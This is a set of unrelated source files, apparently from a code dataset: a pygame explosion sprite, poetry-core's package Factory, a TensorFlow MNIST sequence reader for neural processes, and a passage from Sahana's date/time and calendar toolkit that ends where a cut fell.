filename | text
---|---
the-stack_106_18997
|
import pygame

class Explosion(pygame.sprite.Sprite):
    def __init__(self, center, size):
        pygame.sprite.Sprite.__init__(self)
        self.size = size
        self.explosions = []
        for i in range(9):
            filename = 'explosion_{}.png'.format(i)
            img = pygame.image.load(f'assets/explosion/{filename}').convert()
            img.set_colorkey((0, 0, 0))
            # img_lg = pygame.transform.scale(img, (75, 75))
            self.explosions.append(img)
            # img_sm = pygame.transform.scale(img, (32, 32))
            # self.explosions.append(img_sm)
        # expl = Explosion(obj.get_position(), 'sm')
        self.image = self.explosions[0]
        self.rect = self.image.get_rect()
        self.rect.center = center
        self.frame = 0
        self.last_update = pygame.time.get_ticks()
        self.frame_rate = 50
        self.counter = 0
        self.index = 0

    def update(self, screen):
        explosion_speed = 8
        self.counter += 1
        if self.counter >= explosion_speed and self.index < len(self.explosions) - 1:
            self.counter = 0
            self.index += 1
        screen.blit(self.explosions[self.index], self.rect.center)
        if self.index >= len(self.explosions) - 1 and self.counter >= explosion_speed:
            self.kill()
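# --- Usage sketch (not part of the original file) ---
# A minimal, hedged example of driving the Explosion sprite above; it assumes
# the frame images explosion_0.png .. explosion_8.png exist under
# assets/explosion/ and that a display can be opened.
def demo_explosion():
    pygame.init()
    screen = pygame.display.set_mode((200, 200))
    # Frames are loaded after set_mode(), because convert() needs a display
    group = pygame.sprite.Group(Explosion((100, 100), 'lg'))
    clock = pygame.time.Clock()
    while group:                      # the sprite kill()s itself when finished
        screen.fill((0, 0, 0))
        group.update(screen)          # update() advances and blits the frames
        pygame.display.flip()
        clock.tick(30)
    pygame.quit()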
|
the-stack_106_18998
|
import logging
from pathlib import Path
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import Union
from warnings import warn
from poetry.core.utils.helpers import readme_content_type
if TYPE_CHECKING:
from poetry.core.packages.project_package import ProjectPackage
from poetry.core.packages.types import DependencyTypes
from poetry.core.poetry import Poetry
from poetry.core.spdx.license import License
from poetry.core.version.markers import MarkerTypes
logger = logging.getLogger(__name__)
class Factory:
"""
Factory class to create various elements needed by Poetry.
"""
def create_poetry(
self, cwd: Optional[Path] = None, with_groups: bool = True
) -> "Poetry":
from poetry.core.poetry import Poetry
from poetry.core.pyproject.toml import PyProjectTOML
poetry_file = self.locate(cwd)
local_config = PyProjectTOML(path=poetry_file).poetry_config
# Checking validity
check_result = self.validate(local_config)
if check_result["errors"]:
message = ""
for error in check_result["errors"]:
message += f" - {error}\n"
raise RuntimeError("The Poetry configuration is invalid:\n" + message)
# Load package
name = local_config["name"]
version = local_config["version"]
package = self.get_package(name, version)
package = self.configure_package(
package, local_config, poetry_file.parent, with_groups=with_groups
)
return Poetry(poetry_file, local_config, package)
@classmethod
def get_package(cls, name: str, version: str) -> "ProjectPackage":
from poetry.core.packages.project_package import ProjectPackage
return ProjectPackage(name, version, version)
@classmethod
def configure_package(
cls,
package: "ProjectPackage",
config: Dict[str, Any],
root: Path,
with_groups: bool = True,
) -> "ProjectPackage":
from poetry.core.packages.dependency import Dependency
from poetry.core.packages.dependency_group import DependencyGroup
from poetry.core.spdx.helpers import license_by_id
package.root_dir = root
for author in config["authors"]:
package.authors.append(author)
for maintainer in config.get("maintainers", []):
package.maintainers.append(maintainer)
package.description = config.get("description", "")
package.homepage = config.get("homepage")
package.repository_url = config.get("repository")
package.documentation_url = config.get("documentation")
try:
license_: Optional["License"] = license_by_id(config.get("license", ""))
except ValueError:
license_ = None
package.license = license_
package.keywords = config.get("keywords", [])
package.classifiers = config.get("classifiers", [])
if "readme" in config:
if isinstance(config["readme"], str):
package.readmes = (root / config["readme"],)
else:
package.readmes = tuple(root / readme for readme in config["readme"])
if "platform" in config:
package.platform = config["platform"]
if "dependencies" in config:
group = DependencyGroup("default")
for name, constraint in config["dependencies"].items():
if name.lower() == "python":
package.python_versions = constraint
continue
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name, _constraint, root_dir=package.root_dir
)
)
continue
group.add_dependency(
cls.create_dependency(name, constraint, root_dir=package.root_dir)
)
package.add_dependency_group(group)
if with_groups and "group" in config:
for group_name, group_config in config["group"].items():
group = DependencyGroup(
group_name, optional=group_config.get("optional", False)
)
for name, constraint in group_config["dependencies"].items():
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name,
_constraint,
groups=[group_name],
root_dir=package.root_dir,
)
)
continue
group.add_dependency(
cls.create_dependency(
name,
constraint,
groups=[group_name],
root_dir=package.root_dir,
)
)
package.add_dependency_group(group)
if with_groups and "dev-dependencies" in config:
group = DependencyGroup("dev")
for name, constraint in config["dev-dependencies"].items():
if isinstance(constraint, list):
for _constraint in constraint:
group.add_dependency(
cls.create_dependency(
name,
_constraint,
groups=["dev"],
root_dir=package.root_dir,
)
)
continue
group.add_dependency(
cls.create_dependency(
name, constraint, groups=["dev"], root_dir=package.root_dir
)
)
package.add_dependency_group(group)
extras = config.get("extras", {})
for extra_name, requirements in extras.items():
package.extras[extra_name] = []
# Checking for dependency
for req in requirements:
req = Dependency(req, "*")
for dep in package.requires:
if dep.name == req.name:
dep.in_extras.append(extra_name)
package.extras[extra_name].append(dep)
break
if "build" in config:
build = config["build"]
if not isinstance(build, dict):
build = {"script": build}
package.build_config = build or {}
if "include" in config:
package.include = []
for include in config["include"]:
if not isinstance(include, dict):
include = {"path": include}
formats = include.get("format", [])
if formats and not isinstance(formats, list):
formats = [formats]
include["format"] = formats
package.include.append(include)
if "exclude" in config:
package.exclude = config["exclude"]
if "packages" in config:
package.packages = config["packages"]
# Custom urls
if "urls" in config:
package.custom_urls = config["urls"]
return package
@classmethod
def create_dependency(
cls,
name: str,
constraint: Union[str, Dict[str, Any]],
groups: Optional[List[str]] = None,
root_dir: Optional[Path] = None,
) -> "DependencyTypes":
from poetry.core.packages.constraints import (
parse_constraint as parse_generic_constraint,
)
from poetry.core.packages.dependency import Dependency
from poetry.core.packages.directory_dependency import DirectoryDependency
from poetry.core.packages.file_dependency import FileDependency
from poetry.core.packages.url_dependency import URLDependency
from poetry.core.packages.utils.utils import create_nested_marker
from poetry.core.packages.vcs_dependency import VCSDependency
from poetry.core.semver.helpers import parse_constraint
from poetry.core.version.markers import AnyMarker
from poetry.core.version.markers import parse_marker
if groups is None:
groups = ["default"]
if constraint is None:
constraint = "*"
if isinstance(constraint, dict):
optional = constraint.get("optional", False)
python_versions = constraint.get("python")
platform = constraint.get("platform")
markers = constraint.get("markers")
if "allows-prereleases" in constraint:
message = (
f'The "{name}" dependency specifies '
'the "allows-prereleases" property, which is deprecated. '
'Use "allow-prereleases" instead.'
)
warn(message, DeprecationWarning)
logger.warning(message)
allows_prereleases = constraint.get(
"allow-prereleases", constraint.get("allows-prereleases", False)
)
dependency: Dependency
if "git" in constraint:
# VCS dependency
dependency = VCSDependency(
name,
"git",
constraint["git"],
branch=constraint.get("branch", None),
tag=constraint.get("tag", None),
rev=constraint.get("rev", None),
directory=constraint.get("subdirectory", None),
groups=groups,
optional=optional,
develop=constraint.get("develop", False),
extras=constraint.get("extras", []),
)
elif "file" in constraint:
file_path = Path(constraint["file"])
dependency = FileDependency(
name,
file_path,
groups=groups,
base=root_dir,
extras=constraint.get("extras", []),
)
elif "path" in constraint:
path = Path(constraint["path"])
if root_dir:
is_file = root_dir.joinpath(path).is_file()
else:
is_file = path.is_file()
if is_file:
dependency = FileDependency(
name,
path,
groups=groups,
optional=optional,
base=root_dir,
extras=constraint.get("extras", []),
)
else:
dependency = DirectoryDependency(
name,
path,
groups=groups,
optional=optional,
base=root_dir,
develop=constraint.get("develop", False),
extras=constraint.get("extras", []),
)
elif "url" in constraint:
dependency = URLDependency(
name,
constraint["url"],
groups=groups,
optional=optional,
extras=constraint.get("extras", []),
)
else:
version = constraint["version"]
dependency = Dependency(
name,
version,
optional=optional,
groups=groups,
allows_prereleases=allows_prereleases,
extras=constraint.get("extras", []),
)
if not markers:
marker: "MarkerTypes" = AnyMarker()
if python_versions:
marker = marker.intersect(
parse_marker(
create_nested_marker(
"python_version", parse_constraint(python_versions)
)
)
)
if platform:
marker = marker.intersect(
parse_marker(
create_nested_marker(
"sys_platform", parse_generic_constraint(platform)
)
)
)
else:
marker = parse_marker(markers)
if not marker.is_any():
dependency.marker = marker
dependency.source_name = constraint.get("source")
else:
dependency = Dependency(name, constraint, groups=groups)
return dependency
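# Illustrative calls (not part of the original module) showing the two
# constraint forms accepted by create_dependency(); the package names and
# URL below are hypothetical:
#   Factory.create_dependency("requests", "^2.28")        # plain version string
#   Factory.create_dependency(
#       "mylib", {"git": "https://example.com/mylib.git", "branch": "main"})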
@classmethod
def validate(
cls, config: Dict[str, Any], strict: bool = False
) -> Dict[str, List[str]]:
"""
Checks the validity of a configuration
"""
from poetry.core.json import validate_object
result: Dict[str, List[str]] = {"errors": [], "warnings": []}
# Schema validation errors
validation_errors = validate_object(config, "poetry-schema")
result["errors"] += validation_errors
if strict:
# If strict, check the file more thoroughly
if "dependencies" in config:
python_versions = config["dependencies"]["python"]
if python_versions == "*":
result["warnings"].append(
"A wildcard Python dependency is ambiguous. "
"Consider specifying a more explicit one."
)
for name, constraint in config["dependencies"].items():
if not isinstance(constraint, dict):
continue
if "allows-prereleases" in constraint:
result["warnings"].append(
f'The "{name}" dependency specifies '
'the "allows-prereleases" property, which is deprecated. '
'Use "allow-prereleases" instead.'
)
# Checking for scripts with extras
if "scripts" in config:
scripts = config["scripts"]
for name, script in scripts.items():
if not isinstance(script, dict):
continue
extras = script["extras"]
for extra in extras:
if extra not in config["extras"]:
result["errors"].append(
f'Script "{name}" requires extra "{extra}" which is not'
" defined."
)
# Checking types of all readme files (must match)
if "readme" in config and not isinstance(config["readme"], str):
readme_types = {readme_content_type(r) for r in config["readme"]}
if len(readme_types) > 1:
result["errors"].append(
"Declared README files must be of same type: found"
f" {', '.join(sorted(readme_types))}"
)
return result
@classmethod
def locate(cls, cwd: Optional[Path] = None) -> Path:
cwd = Path(cwd or Path.cwd())
candidates = [cwd]
candidates.extend(cwd.parents)
for path in candidates:
poetry_file = path / "pyproject.toml"
if poetry_file.exists():
return poetry_file
else:
raise RuntimeError(
f"Poetry could not find a pyproject.toml file in {cwd} or its parents"
)
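# Usage sketch (not part of the original module): creating a Poetry instance
# for the project containing the current working directory; assumes a valid
# pyproject.toml can be found by locate():
#   poetry = Factory().create_poetry(Path.cwd())
#   print(poetry.package.name, poetry.package.version)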
|
the-stack_106_18999
|
import collections
import math
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# The (A)NP takes as input a `NPRegressionDescription` namedtuple with fields:
#   `query`: a tuple containing ((context_x, context_y), target_x)
#   `target_y`: a tensor containing the ground truth for the targets to be
#     predicted
#   `num_total_points`: a vector containing a scalar that describes the
#     total number of datapoints used (context + target)
#   `num_context_points`: a vector containing a scalar that describes the
#     number of datapoints used as context
# The MnistReader returns the newly sampled data in this format at each
# iteration
NPRegressionDescription = collections.namedtuple(
"NPRegressionDescription",
("query", "target_y", "num_total_points", "num_context_points",
"hyperparams"))
class MnistReader(object):
"""Generates curves using a Gaussian Process (GP).
Supports vector inputs (x) and vector outputs (y). Kernel is
mean-squared exponential, using the x-value l2 coordinate distance scaled
by some factor chosen randomly in a range. Outputs are
independent gaussian processes.
"""
def __init__(self,
batch_size,
max_num_context,
x_size=1,
y_size=1,
testing=False,
len_seq=10,
len_given=5,
len_gen=10,
canvas_size=84,
speed_min=2.0,
speed_max=3.0,
temporal=False,
case=1,
):
"""Creates a regression dataset of functions sampled from a GP.
Args:
batch_size: An integer.
max_num_context: The max number of observations in the context.
x_size: Integer >= 1 for length of "x values" vector.
y_size: Integer >= 1 for length of "y values" vector.
l1_scale: Float; typical scale for kernel distance function.
sigma_scale: Float; typical scale for variance.
testing: Boolean that indicates whether we are testing.
If so there are more targets for visualization.
"""
self._batch_size = batch_size
self._max_num_context = max_num_context
self._x_size = x_size
self._y_size = y_size
self._testing = testing
self._len_seq = len_seq
self._len_given = len_given
self._len_gen = len_gen
self._canvas_size = canvas_size
self._speed_min = speed_min
self._speed_max = speed_max
self._temporal = temporal
self._case = case
self._noise_factor = 0.1
mnist = input_data.read_data_sets("mnist/", one_hot=True)
if testing:
images = mnist.validation.images
else:
images = mnist.train.images
# normalization to [-0.5,0.5]
images = images - 0.5
self._images = tf.constant(images, dtype=tf.float32)
self._num_samples = self._images.shape[0]
self._sample_size = 28
x_values = []
for i in range(canvas_size):
for j in range(canvas_size):
x_values.append([i,j])
# normalization to [-1,1]
x_values = np.array(x_values)
x_values = 2 * (x_values / (canvas_size-1)) - 1
self._x_values = tf.constant(np.array(x_values),dtype=tf.float32)
def make_canvas(self, x_loc, y_loc, samples):
x_pad = tf.stack(
[x_loc, self._canvas_size-(x_loc+self._sample_size)], axis=1)
y_pad = tf.stack(
[y_loc, self._canvas_size-(y_loc+self._sample_size)], axis=1)
pad = tf.cast(tf.stack([x_pad, y_pad], axis=1),dtype=tf.int32)
canvas = []
for b_idx in range(self._batch_size):
canvas.append(tf.pad(samples[b_idx], pad[b_idx], 'CONSTANT',
constant_values=-0.5))
canvas = tf.stack(canvas, axis=0)
return canvas
def bounce(self, loc, vel):
loc_res, vel_res = [], []
for b_idx in range(self._batch_size):
loc_tmp = tf.cond(tf.less(loc[b_idx],0),
lambda: -1 * loc[b_idx],
lambda: loc[b_idx])
vel_tmp = tf.cond(tf.less(loc[b_idx],0),
lambda: -1 * vel[b_idx],
lambda: vel[b_idx])
loc_tmp = tf.cond(tf.greater_equal(
loc[b_idx],self._canvas_size - self._sample_size),
lambda: 2*(self._canvas_size-self._sample_size)-1*loc[b_idx],
lambda: loc_tmp)
vel_tmp = tf.cond(tf.greater_equal(
loc[b_idx],self._canvas_size - self._sample_size),
lambda: -1 * vel[b_idx],
lambda: vel_tmp)
loc_res.append(loc_tmp)
vel_res.append(vel_tmp)
loc = tf.stack(loc_res, axis=0)
vel = tf.stack(vel_res, axis=0)
return loc, vel
def generate_temporal_curves(self, seed=None):
# Select samples
idx = tf.random_shuffle(tf.range(self._num_samples), seed=seed)
idx = idx[:self._batch_size]
samples = tf.reshape(tf.gather(self._images, idx, axis=0),
[self._batch_size, self._sample_size, self._sample_size])
# initial locations
if self._canvas_size == self._sample_size:
x_loc = tf.constant(np.zeros(self._batch_size), dtype=tf.float32)
y_loc = tf.constant(np.zeros(self._batch_size), dtype=tf.float32)
else:
x_loc = tf.random_uniform([self._batch_size],
0, self._canvas_size-self._sample_size,
seed=seed, dtype=tf.float32)
y_loc = tf.random_uniform([self._batch_size],
0, self._canvas_size-self._sample_size,
seed=seed, dtype=tf.float32)
# Set dynamics
if self._speed_min == self._speed_max:
speed = tf.constant(self._speed_min * np.ones(self._batch_size),
dtype=tf.float32)
else:
speed = tf.random_uniform([self._batch_size],
self._speed_min, self._speed_max, seed=seed)
direc = tf.random_uniform([self._batch_size], 0.0, 2*math.pi,
seed=seed)
y_vel = speed * tf.math.sin(direc)
x_vel = speed * tf.math.cos(direc)
# initial canvas
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
curve_list = []
if (self._case==2) or (self._case==3):
# sparse time or long term tracking
idx = tf.random_shuffle(tf.range(self._len_seq),
seed=seed)[:(self._len_given)]
for t in range(self._len_seq):
if seed is not None:
_seed = seed * t
else:
_seed = seed
if self._case==1: # using len_given
if t < self._len_given:
num_context = tf.random_uniform(shape=[], minval=5,
maxval=self._max_num_context, dtype=tf.int32,
seed=_seed)
else:
num_context = tf.constant(0)
if self._case==2: # sparse time
nc_cond = tf.where(tf.equal(idx,t))
nc_cond = tf.reshape(nc_cond, [-1])
num_context = tf.cond(tf.equal(tf.size(nc_cond),0),
lambda:tf.constant(0),
lambda:tf.random_uniform(shape=[], minval=5,
maxval=self._max_num_context,
dtype=tf.int32, seed=_seed))
if self._case==3: # long term tracking
nc_cond = tf.where(tf.equal(idx,t))
nc_cond = tf.reshape(nc_cond, [-1])
num_context = tf.cond(tf.equal(tf.size(nc_cond),0),
lambda:tf.constant(0),
lambda:tf.constant(30))
if self._temporal:
encoded_t = None
else:
encoded_t = 0.25 + 0.5*t/self._len_seq
curve_list.append(self.generate_curves(canvas, num_context,
_seed, encoded_t))
vel_noise = y_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
y_loc += y_vel + vel_noise
y_loc, y_vel = self.bounce(y_loc, y_vel)
vel_noise = x_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
x_loc += x_vel + vel_noise
x_loc, x_vel = self.bounce(x_loc, x_vel)
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
if self._testing:
for t in range(self._len_seq,self._len_seq+self._len_gen):
if seed is not None:
_seed = seed * t
else:
_seed = seed
num_context = tf.constant(0)
if self._temporal:
encoded_t = None
else:
encoded_t = 0.25 + 0.5*t/self._len_seq
curve_list.append(self.generate_curves(canvas,
num_context,
_seed,
encoded_t))
vel_noise = y_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
y_loc += y_vel + vel_noise
y_loc, y_vel = self.bounce(y_loc, y_vel)
vel_noise = x_vel * self._noise_factor * tf.random_normal(
[self._batch_size], seed=_seed)
x_loc += x_vel + vel_noise
x_loc, x_vel = self.bounce(x_loc, x_vel)
y_loc_int = tf.cast(y_loc, dtype=tf.int32)
x_loc_int = tf.cast(x_loc, dtype=tf.int32)
canvas = self.make_canvas(x_loc_int, y_loc_int, samples)
context_x_list, context_y_list = [], []
target_x_list, target_y_list = [], []
num_total_points_list = []
num_context_points_list = []
for t in range(len(curve_list)):
(context_x, context_y), target_x = curve_list[t].query
target_y = curve_list[t].target_y
num_total_points_list.append(curve_list[t].num_total_points)
num_context_points_list.append(curve_list[t].num_context_points)
context_x_list.append(context_x)
context_y_list.append(context_y)
target_x_list.append(target_x)
target_y_list.append(target_y)
query = ((context_x_list, context_y_list), target_x_list)
return NPRegressionDescription(
query=query,
target_y=target_y_list,
num_total_points=num_total_points_list,
num_context_points=num_context_points_list,
hyperparams=[tf.constant(0)])
def generate_curves(self, canvas, num_context=3,
seed=None, encoded_t=None):
"""Builds the op delivering the data.
Generated functions are `float32` with x values between -2 and 2.
Returns:
A `CNPRegressionDescription` namedtuple.
"""
# If we are testing we want to have more targets and have them evenly
# distributed in order to plot the function.
num_total_points = self._canvas_size * self._canvas_size
if self._testing:
num_target = num_total_points
else:
maxval = self._max_num_context - num_context + 1
num_target = tf.random_uniform(shape=(), minval=1,
maxval=maxval,
dtype=tf.int32, seed=seed)
x_values = tf.tile(
tf.expand_dims(self._x_values,
axis=0),[self._batch_size, 1, 1])
# [batch_size, num_total_points, 1]
y_values = tf.reshape(canvas, [self._batch_size, num_total_points, 1])
if self._testing:
# Select the targets
target_x = x_values
target_y = y_values
if encoded_t is not None:
target_x = tf.concat([
target_x,
tf.ones([self._batch_size, num_total_points, 1]) * encoded_t
], axis=-1)
# Select the observations
idx = tf.random_shuffle(tf.range(num_target), seed=seed)
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
if encoded_t is not None:
context_x = tf.concat([
context_x,
tf.ones([self._batch_size, num_context, 1]) * encoded_t
], axis=-1)
else:
# Select the targets which will consist of the context points
# as well as some new target points
idx = tf.random_shuffle(tf.range(num_total_points), seed=seed)
target_x = tf.gather(x_values, idx[:num_target + num_context], axis=1)
target_y = tf.gather(y_values, idx[:num_target + num_context], axis=1)
if encoded_t is not None:
target_x = tf.concat([
target_x,
tf.ones([self._batch_size, num_target + num_context, 1])
* encoded_t], axis=-1)
# Select the observations
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
if encoded_t is not None:
context_x = tf.concat([
context_x,
tf.ones([self._batch_size, num_context, 1]) * encoded_t
], axis=-1)
query = ((context_x, context_y), target_x)
return NPRegressionDescription(
query=query,
target_y=target_y,
num_total_points=tf.shape(target_x)[1],
num_context_points=num_context,
hyperparams=[tf.constant(0)])
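# Usage sketch (not part of the original file); assumes TF1-style graph mode
# and MNIST data available under "mnist/":
#   reader = MnistReader(batch_size=4, max_num_context=100, testing=True)
#   data = reader.generate_temporal_curves(seed=0)
#   with tf.Session() as sess:
#       (context_xs, context_ys), target_xs = sess.run(data.query)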
|
the-stack_106_19003
|
"""
Date/Time and Calendar Toolkit
Copyright: 2015-2022 (c) Sahana Software Foundation
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("ISOFORMAT",
"S3DateTime",
"S3Calendar",
"S3DateTimeParser",
"S3DateTimeFormatter",
"S3DefaultTZ",
"s3_parse_datetime",
"s3_format_datetime",
"s3_decode_iso_datetime",
"s3_encode_iso_datetime",
"s3_utc",
"s3_get_tzinfo",
"s3_relative_datetime",
)
import datetime
try:
import dateutil
import dateutil.parser
import dateutil.tz
except ImportError:
import sys
sys.stderr.write("ERROR: python-dateutil module needed for date handling\n")
raise
import math
import re
import time
from gluon import current
# =============================================================================
# Constants
#
ISOFORMAT = "%Y-%m-%dT%H:%M:%S" #: ISO 8601 Combined Date+Time format
OFFSET = re.compile(r"([+|-]{0,1})(\d{1,2}):(\d\d)")
RELATIVE = re.compile(r"([+-]{0,1})([0-9]*)([YMDhms])")
SECONDS = {"D": 86400, "h": 3600, "m": 60, "s": 1}
# =============================================================================
class S3DateTime:
"""
Toolkit for date+time parsing/representation
"""
# -------------------------------------------------------------------------
@classmethod
def date_represent(cls, dt, format=None, utc=False, calendar=None):
"""
Represent the date according to deployment settings &/or T()
Args:
dt: the date (datetime.date or datetime.datetime)
format: the format (overrides deployment setting)
utc: the date is given in UTC
calendar: the calendar to use (defaults to current.calendar)
"""
if not format:
format = current.deployment_settings.get_L10n_date_format()
if calendar is None:
calendar = current.calendar
elif isinstance(calendar, str):
calendar = S3Calendar(calendar)
if dt:
if utc:
dt = cls.to_local(dt)
dtstr = calendar.format_date(dt, dtfmt=format, local=True)
else:
dtstr = current.messages["NONE"]
return dtstr
# -----------------------------------------------------------------------------
@classmethod
def datetime_represent(cls, dt, format=None, utc=False, calendar=None):
"""
Represent the datetime according to deployment settings &/or T()
Args:
dt: the datetime
utc: the datetime is given in UTC
calendar: the calendar to use (defaults to current.calendar)
"""
if format is None:
format = current.deployment_settings.get_L10n_datetime_format()
if calendar is None:
calendar = current.calendar
elif isinstance(calendar, str):
calendar = S3Calendar(calendar)
if dt:
if utc:
dt = cls.to_local(dt)
dtstr = calendar.format_datetime(dt, dtfmt=format, local=True)
else:
dtstr = current.messages["NONE"]
return dtstr
# -----------------------------------------------------------------------------
@classmethod
def time_represent(cls, time, format=None, utc=False):
"""
Represent the time according to deployment settings &/or T()
Args:
time: the time
format: the time format (overrides deployment setting)
utc: the time is given in UTC
"""
settings = current.deployment_settings
if format is None:
format = settings.get_L10n_time_format()
if time and utc:
# Make sure to use datetime.datetime (to support timedelta)
if not isinstance(time, datetime.datetime):
today = datetime.datetime.utcnow().date()
time = datetime.datetime.combine(today, time)
time = cls.to_local(time)
if isinstance(time, datetime.datetime):
# Prevent error with dates<1900: convert into datetime.time
time = time.time()
if time:
try:
return time.strftime(str(format))
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(time))
else:
return current.messages["NONE"]
# -----------------------------------------------------------------------------
@classmethod
def to_local(cls, dt):
"""
Convert a date or datetime to local timezone
Args:
dt: the date/datetime; if it is tz-naive it is assumed to be in UTC
Returns:
a tz-naive datetime in local timezone
"""
if not dt:
return None
tzinfo = s3_get_tzinfo()
if tzinfo:
if not isinstance(dt, datetime.datetime):
# Compute breakpoint local time for UTC date
combine = datetime.datetime.combine
bp = cls.to_utc(combine(dt, datetime.time(8, 0, 0))).time()
dt = combine(dt, bp)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=dateutil.tz.tzutc())
dt = dt.astimezone(tz=tzinfo).replace(tzinfo=None)
else:
offset = cls.get_offset_value(cls.get_utc_offset())
if offset:
delta = datetime.timedelta(seconds=offset)
else:
delta = datetime.timedelta(0)
if not isinstance(dt, datetime.datetime):
# Compute breakpoint local time for UTC date
combine = datetime.datetime.combine
bp = (combine(dt, datetime.time(8, 0, 0)) - delta).time()
dt = combine(dt, bp)
if dt.tzinfo is not None:
dt = dt.astimezone(tz=dateutil.tz.tzutc()).replace(tzinfo=None)
dt = dt + delta
return dt
# -----------------------------------------------------------------------------
@classmethod
def to_utc(cls, dt):
"""
Convert a date or datetime to UTC
Args:
dt: the date or datetime; if it is tz-naive it is assumed to
be in local time
Returns:
tz-naive datetime in UTC
"""
if not dt:
return None
date_only = not isinstance(dt, datetime.datetime)
if date_only or not dt.tzinfo:
tzinfo = s3_get_tzinfo()
if tzinfo:
if date_only:
# Compute UTC date for 08:00 local time
dt = datetime.datetime.combine(dt, datetime.time(8, 0, 0))
dt = dt.replace(tzinfo=tzinfo)
else:
offset = cls.get_offset_value(cls.get_utc_offset())
if date_only:
# Compute UTC date for 08:00 local time
dt = datetime.datetime.combine(dt, datetime.time(8, 0, 0))
dt = dt - datetime.timedelta(seconds=offset)
if dt.tzinfo:
dt = dt.astimezone(tz=dateutil.tz.tzutc()).replace(tzinfo=None)
return dt
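# Conversion sketch (illustrative, not part of the original module), assuming
# the client timezone resolves to UTC+01:00:
#   S3DateTime.to_local(datetime.datetime(2022, 6, 1, 12, 0))
#       -> datetime.datetime(2022, 6, 1, 13, 0)   # tz-naive, local time
#   S3DateTime.to_utc(datetime.datetime(2022, 6, 1, 13, 0))
#       -> datetime.datetime(2022, 6, 1, 12, 0)   # tz-naive, UTC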
#--------------------------------------------------------------------------
@staticmethod
def get_utc_offset():
"""
Get the current UTC offset for the client, fallback if the
client does not support timezone introspection and no default
timezone is configured
"""
offset = None
session = current.session
request = current.request
# 1st choice is what the client provides in the hidden form
# field (for form POSTs)
offset = request.post_vars.get("_utc_offset", None)
if offset:
offset = int(offset)
utcstr = offset < 0 and "+" or "-"
hours = abs(int(offset/60))
minutes = abs(int(offset % 60))
offset = "%s%02d%02d" % (utcstr, hours, minutes)
if not offset:
# 2nd choice is the previous value from the current session
offset = session.s3.utc_offset
else:
# Remember it
session.s3.utc_offset = offset
return offset
# -----------------------------------------------------------------------------
@staticmethod
def get_offset_value(string):
"""
Convert an UTC offset string into a UTC offset value in seconds
Args:
string: the UTC offset in hours as string, valid formats
are: "+HH:MM", "+HHMM", "+HH" (positive sign can
be omitted), can also recognize decimal notation
with "." as mark
"""
if not string:
return 0
sign = 1
offset_hrs = offset_min = 0
if isinstance(string, (int, float)):
offset_hrs = string
elif isinstance(string, str):
if string[:3] == "UTC":
string = string[3:]
string = string.strip()
match = OFFSET.match(string)
if match:
groups = match.groups()
if groups[0] == "-":
sign = -1
offset_hrs = int(groups[1])
offset_min = int(groups[2])
elif "." not in string:
try:
offset_hrs = int(string)
except ValueError:
return 0
if offset_hrs < -99 or offset_hrs > 99:
if offset_hrs < 0:
sign = -1
offset_hrs, offset_min = divmod(abs(offset_hrs), 100)
else:
try:
offset_hrs = float(string)
except ValueError:
return 0
else:
return 0
return sign * (3600 * offset_hrs + 60 * offset_min)
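# Illustrative results (not part of the original module); return values are
# offsets in seconds:
#   S3DateTime.get_offset_value("+05:30")    -> 19800
#   S3DateTime.get_offset_value("UTC -0800") -> -28800
#   S3DateTime.get_offset_value("2.5")       -> 9000.0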
# =============================================================================
class S3Calendar:
"""
Calendar Base Class (implementing the Gregorian Calendar)
Subclasses define their own CALENDAR name, and are registered
with this name in the calendars dict in S3Calendar._set_calendar().
"""
CALENDAR = "Gregorian"
# -------------------------------------------------------------------------
# Constants to be implemented by subclasses
# -------------------------------------------------------------------------
JDEPOCH = 1721425.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December",
)
MONTH_ABBR = ("Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec",
)
MONTH_DAYS = (31, (28, 29), 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
FIRST_DOW = 1 # Monday
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar, to be implemented by subclass
Args:
jd: the Julian day number
"""
# Gregorian calendar uses default method
return cls._jd_to_gregorian(jd)
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number, to be implemented by subclass
Args:
year: the year number
month: the month number
